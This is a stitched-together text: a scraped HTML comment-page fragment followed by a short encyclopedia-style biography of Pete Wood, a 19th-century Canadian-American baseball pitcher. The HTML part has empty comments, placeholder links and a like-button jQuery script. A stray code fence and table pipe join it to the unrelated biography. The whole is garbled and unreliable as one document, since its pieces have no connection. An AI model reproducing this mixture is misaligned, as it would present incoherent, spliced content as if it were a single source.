<h3 class="detailTitle"></h3>
<p class="detail"></p>
<h5 class="rating">
<div class="ratingText"><span>(<span id="ratingSpan">0</span>)</span>:</div>
<div class="myrating">
<span rel="-2" data-title=""></span>
<span rel="-1" data-title=""></span>
<span rel="0" data-title=""></span>
<span rel="1" data-title=""></span>
<span rel="2" data-title=""></span>
<div id="ratingShow">
</div>
</div>
</h5>
<input type="hidden" id="myRating" value="" />
<hr align="center" />
<h2></h2>
<div id="replys" class="replys">
<ol class="replylist">
<li class="reply clearfix">
<div class="reply-content">
<div class="reply-info">
<span class="addtime">2014-01-14 18:26</span> |
<a target='_blank' href="path_to_url"></a> <!-- @zm 2013-12-13 Begin -->
( | <!-- @zm 2013-12-13 End -->
Rank:1 :2 | )
<div class="likebox">
<span class="likepre" title="" rel="76927"></span>
<span class="liketext liketext_min"><span id="likenum_76927">0</span></span>
<span class="likesuf"></span>
</div>
</div><!-- reply-info End -->
<div class="description">
<p> </p>
</div>
<div class="replylist-act">
<span class="floor">1#</span>
<a title=" " href="javascript:void(0)" class="replyBtn" onclick="Reply('')"></a>
</div>
</div><!-- reply-content End -->
</li>
<li class="reply clearfix">
<div class="reply-content">
<div class="reply-info">
<span class="addtime">2014-01-14 18:34</span> |
<a target='_blank' href="path_to_url">Stranger</a> <!-- @zm 2013-12-13 Begin -->
( | <!-- @zm 2013-12-13 End -->
Rank:0 :1 | .....)
<div class="likebox">
<span class="likepre" title="" rel="76929"></span>
<span class="liketext liketext_min"><span id="likenum_76929">0</span></span>
<span class="likesuf"></span>
</div>
</div><!-- reply-info End -->
<div class="description">
<p>,,........ </p>
</div>
<div class="replylist-act">
<span class="floor">2#</span>
<a title=" Stranger" href="javascript:void(0)" class="replyBtn" onclick="Reply('Stranger')"></a>
</div>
</div><!-- reply-content End -->
</li>
<li class="reply clearfix">
<div class="reply-content">
<div class="reply-info">
<span class="addtime">2014-01-15 04:21</span> |
<a target='_blank' href="path_to_url"></a> <!-- @zm 2013-12-13 Begin -->
( | <!-- @zm 2013-12-13 End -->
Rank:28 :24 | ~)
<div class="likebox">
<span class="likepre" title="" rel="76970"></span>
<span class="liketext liketext_min"><span id="likenum_76970">0</span></span>
<span class="likesuf"></span>
</div>
</div><!-- reply-info End -->
<div class="description">
<p>.... </p>
</div>
<div class="replylist-act">
<span class="floor">3#</span>
<a title=" " href="javascript:void(0)" class="replyBtn" onclick="Reply('')"></a>
</div>
</div><!-- reply-content End -->
</li>
</ol><!-- replylist End -->
</div><!-- replys End -->
<div id="reply" class="reply">
<a name="comment"></a>
<p class="detail">
<a href="path_to_url"><u></u></a>
</p>
<script type="text/javascript">
var masaic = '0';
function CommentLike(id){
$.post("/ajaxdo.php?module=commentrating",{"id":id,"token":$("#token").val()},function(re){
re=parseInt(re);
switch(re){
case 1:
$("#likenum_"+id).html(parseInt($("#likenum_"+id).html())+1);
break;
case 4:
alert(_LANGJS.COMMENT_GOOD_DONE);
break;
case 6:
alert(_LANGJS.COMMENT_SELF);
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$(".likebox .likepre").click(function(){
CommentLike($(this).attr("rel"));
});
});
</script>
<div>
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<span class="copyright fleft">
<a href="path_to_url">ICP15041338-1</a>
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<a href="path_to_url"></a>
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<a href="path_to_url"></a>
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if (top.location !== self.location) top.location=self.location;
</script>
</body>
</html>
``` |
Peter Burke Wood (1 February 1867 – 15 March 1923) was a Canadian-American professional baseball pitcher. A right-hander, he played parts of two seasons in Major League Baseball, 1885 and 1889.
A native of Dundas, Ontario, Wood made his major league debut on 15 July 1885 with the Buffalo Bisons, the team which also featured on its roster his brother, Fred. The brothers were with the team for the remainder of the season, at the end of which Fred retired. Four years later, Wood returned to Major League Baseball, playing for the Philadelphia Quakers in 1889. His final game with the team was on September 7.
Pete Wood died in Chicago six weeks past his 56th birthday.
External links
Pete Wood Stats at Baseball Almanac
1867 births
1923 deaths
19th-century baseball players
Baseball players from Hamilton, Ontario
Buffalo Bisons (minor league) players
Buffalo Bisons (NL) players
Canadian expatriate baseball players in the United States
Hamilton Primrose players
Hamilton Clippers players
Hamilton Hams players
London (minor league baseball) players
London Tecumsehs (baseball) players
Major League Baseball pitchers
Major League Baseball players from Canada
Philadelphia Quakers players
People from Dundas, Ontario
Toronto Canucks players |
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